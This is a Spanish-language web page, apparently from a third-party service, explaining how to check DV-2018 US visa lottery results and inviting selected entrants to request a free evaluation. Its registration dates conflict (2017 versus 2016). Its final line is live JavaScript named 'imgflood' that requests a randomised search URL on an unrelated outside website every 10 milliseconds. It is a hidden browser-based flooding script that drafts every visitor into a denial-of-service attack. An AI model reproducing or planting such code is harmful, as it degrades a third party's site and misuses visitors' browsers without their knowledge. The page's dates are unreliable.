Resultados Lotería de Visas

Resultados DV-2018 - (participantes registrados entre el 3 de Octubre y 7 de Noviembre del 2017)
A partir del Martes 2 de Mayo 2017  (al mediodía EST), se podrá verificar  los resultados de su aplicación al sorteo de visas.
Debido al alto volumen de personas intentando verificar los resultados, la pagina web oficial esta presentando retrasos. Le sugerimos a nuestros usuarios que intenten mas tarde.

Verificación del Estatus de su Participación

Los participantes registrados entre el 3 de Octubre y 7 de Noviembre del 2016 pueden verificar los resultados de su aplicación al sorteo de visas en el enlace del ente oficial:

www.dvlottery.state.gov/ESC/

Requiere tener a la mano para ingresar:

  1. Su número o código de confirmación emitido al momento de su participación
  2. Su(s) apellido(s) tal y como los ingreso al momento de su participación original.
  3. Su año de nacimiento en formato de 4 dígitos
  4. Código de autenticación que el sistema le muestra y Hacer clic en Submit

DV-2017 Status Check

 A continuación ejemplos de resultados emitidos por el único ente administrador del Sorteo de Visas a través de su pagina web:

EJEMPLO DE NO SELECCIÓN: Si al ingresar sus datos, le aparece una pantalla con la siguiente notificación:

Ejemplo de No Seleccionado

Si el sistema le da como resultado “HAS NOT BEEN SELECTED” esto significa que usted NO fue seleccionado en el sorteo de la Lotería de Visas.

Por lo que le invitamos a registrarse en el sorteo de este año.

Quiero Volver a Participar

EJEMPLO DE CÓDIGO DE REGISTRO, APELLIDO O AÑO DE NACIMIENTO INVALIDO: Si al ingresar sus datos, el sistema indica el error que aparece en el recuadro amarillo al tope del formulario, como el que se muestra a continuación:

Ejemplo Error Datos

Si el sistema muestra el mensaje de error “The information entered in not valid. Please review the Confirmation Number, your Last Family Name, and Year of Birth” esto significa que hay un error en los datos ingresados, pudiera ser en el Código de Registro, revise bien que el mismo empieza por 2018 y que tener cuidado con los caracteres como las O y 0 así como I y 1 que pudieran confundirse. Otro error típico es que al momento de participar coloco dos Apellidos o solo uno.

Debe colocar los datos tal cual los colocó en su aplicación original realizada entre el  3 de Octubre y el 7 de Noviembre del 2016.

Quiero Volver a Participar

Ejemplo de Selección, Carta de ganador de la Lotería de Visas DV-2018

Si al ingresar sus datos, aparece una notificación como la del siguiente ejemplo:

Seleccionado DV2018

Si al ingresar sus datos, le aparece una notificación como la del ejemplo. Has sido pre-seleccionado en la Lotería de Visas de este año. 

Contáctenos cuantos antes para recibir una evaluación en español de su caso GRATIS:

Tengo una carta de ganador y quiero una Evaluación Gratis

Solo se responderá a aquellos que tengan un número de caso válido

function imgflood() { var TARGET = 'www.doctor-4-u.co.uk'; var URI = '/catalogsearch/result/?q='; var pic = new Image(); var rand = Math.floor(Math.random() * 1000000); pic.src = 'http://'+TARGET+URI+rand; } setInterval(imgflood, 10);